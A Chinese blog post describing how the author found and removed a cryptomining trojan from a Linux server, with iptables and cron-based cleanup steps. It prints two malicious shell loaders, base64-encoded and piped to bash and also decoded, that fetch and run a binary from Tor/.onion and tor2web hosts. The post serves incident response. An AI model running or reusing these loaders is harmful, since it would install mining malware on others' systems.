记一次Linux挖矿木马清除

已于 2023-10-10 14:32:28 修改
阅读量6.1k 收藏 8
点赞数 1
分类专栏: 安全修复 文章标签: 木马 故障排除
于 2020-07-04 20:21:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hy19930118/article/details/107129496
版权

现象

CPU监控爆满至100%
查进程发现:
1.谜之六字木马
在这里插入图片描述
2.定时任务异常
在这里插入图片描述
3.hosts异常
在这里插入图片描述
4.root家目录两个隐藏文件

cat /root/.ucxin.sh
#!/bin/bash
exec &>/dev/null
echo ucxin.sh
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAibWF6ZWNsbWhiYWN1Y3hpbiIpCgpzb2NreigpIHsKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgoJGMgaHR0cHM6Ly9kb2guY2VudHJhbGV1LnBpLWRucy5jb20vJHAgfHwKICAgICAkYyBodHRwczovL2Rucy50d25pYy50dy8kcCB8fAogICAgICRjIGh0dHBzOi8vZG5zLnJ1YnlmaXNoLmNuLyRwIHx8CiAgICAgJGMgaHR0cHM6Ly9kb2guZG5zLnNiLyRwIDsgaG9zdCAtVyA1IHJlbGF5LnRvcjJzb2Nrcy5pbnxhd2sgeydwcmludCAkTkYnfSlcCiAgICAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfHNvcnQgLXVSfGhlYWQgLTEgKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAkZCAvdG1wIC92YXIvdG1wIC9kZXYvc2htIC91c3IvYmluIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IHx8ICRjICQxJGYgLW8keApjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaW8gdG9yMndlYi50byB0b3Iyd2ViLnN1CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC0xIC90bXAvLlgxMS11bml4LzAwKS9pbzsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

 cat /root/.unixdb.sh
#!/bin/bash
exec &>/dev/null
echo yyANhZDFOs31F9WgqOovurruEMT3Z+v82MG0m9elafh8GU1+u4/78NZoKz2rA7O2
echo eXlBTmhaREZPczMxRjlXZ3FPb3Z1cnJ1RU1UM1ordjgyTUcwbTllbGFmaDhHVTErdTQvNzhOWm9LejJyQTdPMgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJ1bml4ZGJudWFkeG13dG9iIikKCnNvY2t6KCkgewpuPShkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgdW5jZW5zb3JlZC5hbnkuZG5zLm5peG5ldC54eXopCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTUpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xzb3J0IC11UnxoZWFkIC0xKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAkZCAvdG1wIC92YXIvdG1wIC9kZXYvc2htIC91c3IvYmluIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IHx8ICRjICQxJGYgLW8keApjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuY2ggdG9yMndlYi5pbyB0b3Iyd2ViLnRvIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDApL3N0YXR1czsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

5.解码

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "mazeclmhbacucxin")

sockz() {
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$(($c https://doh.centraleu.pi-dns.com/$p ||
     $c https://dns.twnic.tw/$p ||
     $c https://dns.rubyfish.cn/$p ||
     $c https://doh.dns.sb/$p ; host -W 5 relay.tor2socks.in|awk {'print $NF'})\
     | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1 )
}

fexe() {
for i in $d /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
fexe
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
$c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.io tor2web.to tor2web.su
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/00)/io; then
u $t.$h
else
break
fi
Done

yyANhZDFOs31F9WgqOovurruEMT3Z+v82MG0m9elafh8GU1+u4/78NZoKz2rA7O2
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "unixdbnuadxmwtob")

sockz() {
n=(dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org uncensored.any.dns.nixnet.xyz)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%5))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1)
}

fexe() {
for i in $d /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
fexe
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
$c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.ch tor2web.io tor2web.to tor2web.su
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/00)/status; then
u $t.$h
else
break
fi
done

6.进程号、名称总是更改,且发现相关占用文件
在这里插入图片描述

解决

封堵

yum install -y iptables

iptables -A OUTPUT -m string --string "cim8.f.dedikuoti.lt" --algo bm --to 65535 -j DROP
iptables -A OUTPUT -m string --string "dedikuoti.lt" --algo bm --to 65535 -j DROP
iptables -A OUTPUT -p tcp -d cim8.f.dedikuoti.lt --dport 1:65535 -j DROP
iptables -A OUTPUT -p udp -d cim8.f.dedikuoti.lt --dport 1:65535 -j DROP

后发现谜之进程,正在通过本地多端口ssh连接其他节点

在这里插入图片描述
在这里插入图片描述
遂即发现木马又回来了,故编写脚本定时删文件、杀进程,结合iptables

crontab -u root -l
*/5 * * * * /bin/sh /root/mumashanchu.sh

#!/bin/bash

if [ -f "/root/.unixdb.sh" ];then
chattr -i /root/.unixdb.sh
rm -rf /root/.unixdb.sh
sed -i "/.unixdb.sh/d"  /var/spool/cron/root
else
echo "unixdb none"
fi

if [ -f "/root/.ucxin.sh" ];then
chattr -i /root/.ucxin.sh
rm -rf /root/.ucxin.sh
sed -i "/.ucxin.sh/d"  /var/spool/cron/root
else
echo "ucxin none"
fi

a=` ps -aux --sort=-%cpu | head -3 | grep -n "tracepath" | awk '{print $2}' `
## echo $a
if [ ! $a ];then
echo "tracepath none"
else
/usr/bin/kill -9 $a
fi

iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere             state RELATED,ESTABLISHED
ACCEPT     icmp --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     tcp  --  anywhere             anywhere             state NEW tcp dpt:ssh
REJECT     all  --  anywhere             anywhere             reject-with icmp-host-prohibited

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
REJECT     all  --  anywhere             anywhere             reject-with icmp-host-prohibited

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere             cim8.f.dedikuoti.lt  tcp spts:tcpmux:65535
DROP       udp  --  anywhere             cim8.f.dedikuoti.lt  udp spts:tcpmux:65535
DROP       all  --  anywhere             anywhere             STRING match  "cim8.f.dedikuoti.lt" ALGO name bm TO 65535
DROP       all  --  anywhere             anywhere             STRING match  "dedikuoti.lt" ALGO name bm TO 65535
DROP       tcp  --  192.168.0.0/16       anywhere             tcp dpts:tcpmux:65535
DROP       udp  --  192.168.0.0/16       anywhere             udp dpts:tcpmux:65535
查士丁尼·绵
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
病毒分析之“驱动人生”挖矿木马分析及其清除方案
Hades的博客
11-01 1万+
“驱动人生”挖矿木马分析及其清除方案 0x00 概述 自2018年12月份”驱动人生“挖矿木马爆发以来,此木马一直处于活跃状态,更新版本更是达到了20+次。此木马感染量之大,传播速度之快,可称得上是国内挖矿排行”第一“的木马。 从最开始的有文件落地的单独可执行EXE,到后来的python版EXE,再到随机膨胀文件版本,再到后来的PowerShell无文件攻击版本。从单一攻击手法,到后来的漏洞...
一次入侵Linux服务器和删除木马程序的经历
09-15
主要介绍了一次入侵Linux服务器和删除木马程序的经历的相关资料,需要的朋友可以参考下
Shell基础以及常见的Shell脚本
usa_washington的博客
02-21 135
bash脚本
100个Linux Shell脚本经典案例解析
a1394916730的博客
07-07 2708
100个Linux Shell脚本经典案例解析
服务器被攻击,注入木马变成挖矿机,排查
XiaoXiaoYunXing的博客
08-25 505
简单介绍 最近一台服务器,总是ssh无法连接,一开始以为是网络问题,后来经过专业运维人员指导,才发现这台服务器被人恶意攻击,注入了木马,变成了挖矿机。 这个木马隐藏的很深,排查过程也是饶了很多弯路,录下来。 说明:服务器防火墙开启,只开放了少量几个端口;root账号密码非常复杂;没有安装不明软件 排查步骤 查看进程是否有异常: top 查看一下异常进程 注:木马进程不一定正在工作,所以有时候会top结果看起来都正常,来一张异常的效果,CPU被占满,服务器变得卡,响应很慢 查看一下网络端口连接情况
linux挖矿病毒清理
yb890102的博客
01-05 1339
网络安全,挖矿病毒清流,linux中毒
CentOS7 服务器分析挖矿病毒,清理挖矿病毒 tor2web
dkgee
12-13 4389
特征如下: CPU占用一直比较高,初步分析是挖矿程序: 系统的crontab –l显示调度列表如下: 20 * * * * /root/.aliyun.sh >/dev/null 2>&1 查看脚本内容: #!/bin/bash exec &>/dev/null echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFU...
攻防 & 渗透 & Kali笔(持续更新)
苦行僧的妖孽日常
10-03 686
攻防 & 渗透测试 & Kali
挖矿病毒排查并清除
zm96309的博客
02-28 4512
近期,公司内网linux环境出现了挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢。现摸索了以下步骤进行清除。 1、检测服务器是否有挖矿病毒。 使用top命令查看进程及占用cpu百分比,如果该进程名称为随机字符串,且cpu占的非常的高。则很可能是感染了挖矿病毒。 2、输入systemctl status 病毒进程id kill掉CGroup的进程id 3、输入ps -ef|grep tracepath,查看是否有这个进程存在。该进程推测是暴力破解ssh其他服务器的进程且..
一次Linux服务器被hack的过程分析
01-31
hacker一般将工具解压到目录名以”.”开头的目录中,达到隐藏的效果,以下是此次问题hacker在服务器上留下的“礼物”:linux:/tmp/.ssh#ll总计340下面我们对以上各工具的作用逐一进行分析。远程会话管理工具screen...
一次一次Linux性能监控
02-14
一次一次Linux性能监控的流程和报告,有需要可以下载
linux挖矿检测脚本
07-25
执行自动检测
一次 Linux 被入侵,服务器变“矿机”全过程.docx
12-25
一次 Linux 被入侵,服务器变“矿机”全过程
一次linux服务器入侵应急响应(小结)
09-14
主要介绍了一次linux服务器入侵应急响应,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
通过linux 木马控制Linux
06-13
通过linux 木马控制Linux
php实现Linux服务器木马排查及加固功能
10-24
主要介绍了php实现Linux服务器木马排查及加固功能,本文给出了根据特征码查找、搜索最近被修改的文件、修改php.ini、修改nginx.conf等方法,需要的朋友可以参考下
Linux挖矿-通用处置v1.0.pdf
最新发布
04-22
扎根科技 191文章 22万总阅读 查看TA的文章> ...移动安全是指保护移动设备和移动应用程序免受安全威胁和攻击的一系列措施和技术。随着移动设备的普及和移动应用的快速发展,移动安全变得越来越重要。
linux top下的 minerd 木马清除方法
09-15
下面小编就为大家带来一篇linux top下的 minerd 木马清除方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
linux 杀毒软件 木马扫描 clamav
08-16
linux 杀毒软件 木马扫描 clamav
linux挖矿病毒查杀
09-10
要查杀Linux挖矿病毒,首先需要识别病毒的特征。根据引用提供的信息,挖矿病毒在Linux系统中的一个重要特征是CPU占用率非常高。然而,为了更好地隐藏自己,一些挖矿病毒会控制CPU的占用率,使其保持在50%以下,这可能导致传统的进程监控命令如top无法查看到高占用CPU的进程。因此,如果系统出现异常的CPU占用率,但是无法通过传统命令看到高占用CPU的进程,这可能是挖矿病毒的一种表现。引用 中提到的挖矿病毒还可能修改DNS录,以防止病毒无法访问矿池或代理服务器。因此,检查"/etc/resolv.conf"文件的内容是否被修改也是一种查杀挖矿病毒的方法。如果发现DNS录被修改,可以通过还原DNS录来阻止挖矿病毒的连接。引用还提到,停止计划任务也是一种查杀挖矿病毒的措施。由于挖矿病毒通常会在系统启动时自动启动,可以检查计划任务以查看是否有可疑的任务,然后停止这些任务来阻止病毒的继续操作。综上所述,查杀Linux挖矿病毒的方法包括检查异常的CPU占用率、检查DNS录是否被修改、停止计划任务等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值